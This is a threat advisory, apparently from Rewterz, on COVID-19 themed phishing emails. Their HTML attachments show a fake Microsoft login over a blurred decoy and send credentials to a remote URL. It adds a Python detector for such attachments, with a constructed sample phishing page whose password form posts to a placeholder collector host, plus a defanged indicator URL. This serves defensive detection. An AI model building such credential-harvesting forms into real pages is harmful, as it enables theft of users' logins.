Rewterz Threat Advisory
Severity
Medium
Analysis Summary
Plenty of COVID-19 themed phishing emails have been observed since the outbreak started. One specific campaign claims that an employee has tested positive for the virus and that updated guidelines are being provided to prevent further infections. The email bodies vary slightly, but the subject lines follow the same pattern and every message carries an HTML file as an attachment. Opening the HTML file displays a blurred document overlaid with a Microsoft login box in the browser. The blurred decoy document contains COVID-19 related information, increasing its perceived legitimacy. Attempting to log in leads to the exfiltration of the entered credentials to a remote URL. The researchers note that the style sheets for the HTML file are hosted on a compromised site and that the blurred background image is hosted on a legitimate image hosting site.
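The traits described above (a local HTML attachment containing a password form that posts to a remote host, an externally hosted style sheet, and a blurred decoy image) can be turned into a simple mail-gateway or triage check. The following Python script is an added example written for this advisory, not Rewterz tooling; it uses only the standard library. The sample HTML documents, the `collector.example` / `images.example` / `compromised.example` host names and the function names are constructed for illustration. The only page-derived value is the defanged URL from the Indicators of Compromise section, whose host is used as a block-list entry.

```python
"""Heuristic triage of HTML e-mail attachments for credential-phishing traits.

Flags the pattern from the advisory: a password field whose form posts to a
remote host, externally hosted CSS, and a blurred background over a remote image.
All sample inputs below are constructed; only IOC_URL comes from the advisory.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Defanged indicator copied from the advisory's IoC section.
IOC_URL = "hxxp[:]//tokai-lm.jp/style/89887cc/5789n.php?98709087-87634423"


def refang(ioc: str) -> str:
    """Turn a defanged indicator (hxxp[:]//host[.]tld) back into a plain URL."""
    return ioc.replace("hxxp", "http").replace("[:]", ":").replace("[.]", ".")


def ioc_host(ioc: str) -> str:
    """Host name of a defanged URL, suitable for a proxy/DNS block list."""
    return urlparse(refang(ioc)).hostname or ""


class _AttachmentScanner(HTMLParser):
    """Collects the attributes the heuristics need from one HTML document."""

    def __init__(self):
        super().__init__()
        self.form_actions = []        # action= targets of every <form>
        self.has_password_field = False
        self.external_stylesheets = []  # href= of <link rel="stylesheet">
        self.remote_images = []       # absolute http(s) <img src=...>
        self.uses_blur = False        # CSS blur() anywhere in the document

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password_field = True
        elif tag == "link" and "stylesheet" in (a.get("rel") or "").lower() and a.get("href"):
            self.external_stylesheets.append(a["href"])
        elif tag == "img" and (a.get("src") or "").startswith(("http://", "https://")):
            self.remote_images.append(a["src"])
        if "blur(" in (a.get("style") or ""):
            self.uses_blur = True

    def handle_data(self, data):
        # Contents of <style> blocks arrive here as raw text.
        if "blur(" in data:
            self.uses_blur = True


def scan_attachment(html: str, blocked_hosts=frozenset()) -> dict:
    """Return {"suspicious": bool, "findings": [...]} for one HTML attachment.

    The verdict is "suspicious" when a password field posts to a remote host or
    when any form posts to a host on the block list; the remaining traits are
    reported as supporting findings only.
    """
    p = _AttachmentScanner()
    p.feed(html)
    p.close()

    findings = []
    remote_action_hosts = []
    for action in p.form_actions:
        host = urlparse(action).hostname  # None for relative actions
        if host:
            remote_action_hosts.append(host)
            if host in blocked_hosts:
                findings.append(f"form posts to known-bad host {host}")

    suspicious = bool([f for f in findings if "known-bad" in f])
    if p.has_password_field and remote_action_hosts:
        findings.append("password field posts to remote host(s): "
                        + ", ".join(remote_action_hosts))
        suspicious = True
    elif p.has_password_field:
        findings.append("password field in a local HTML attachment")
    if p.external_stylesheets:
        findings.append(f"{len(p.external_stylesheets)} externally hosted stylesheet(s)")
    if p.uses_blur and p.remote_images:
        findings.append("blurred decoy over a remotely hosted image")
    return {"suspicious": suspicious, "findings": findings}


# Constructed sample attachments (not real campaign files).
SAMPLE_PHISH = """<html><head>
<link rel="stylesheet" href="https://compromised.example/style/main.css">
<style>.bg { filter: blur(6px); }</style></head>
<body><img class="bg" src="https://images.example/decoy.png">
<form method="post" action="https://collector.example/login.php?id=1">
  <input name="email"><input type="password" name="pw"><button>Sign in</button>
</form></body></html>"""

SAMPLE_BENIGN = "<html><body><h1>Meeting notes</h1><p>No forms here.</p></body></html>"


if __name__ == "__main__":
    blocked = {ioc_host(IOC_URL)}
    for name, doc in (("phish", SAMPLE_PHISH), ("benign", SAMPLE_BENIGN)):
        print(name, scan_attachment(doc, blocked))
```

In a mail-filtering pipeline the block list would be fed from the advisory's IoC feed rather than a single hard-coded URL, and a "suspicious" verdict would quarantine the message for analyst review rather than reject it outright, since legitimate HTML attachments occasionally contain forms.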
Impact
- Credential theft
- Exposure of sensitive data
Indicators of Compromise
URL
hxxp[:]//tokai-lm.jp/style/89887cc/5789n.php?98709087-87634423
Remediation
- Block all threat indicators at your respective controls.
- Always be suspicious of emails sent by unknown senders.
- Never click on the links/attachments sent by unknown senders.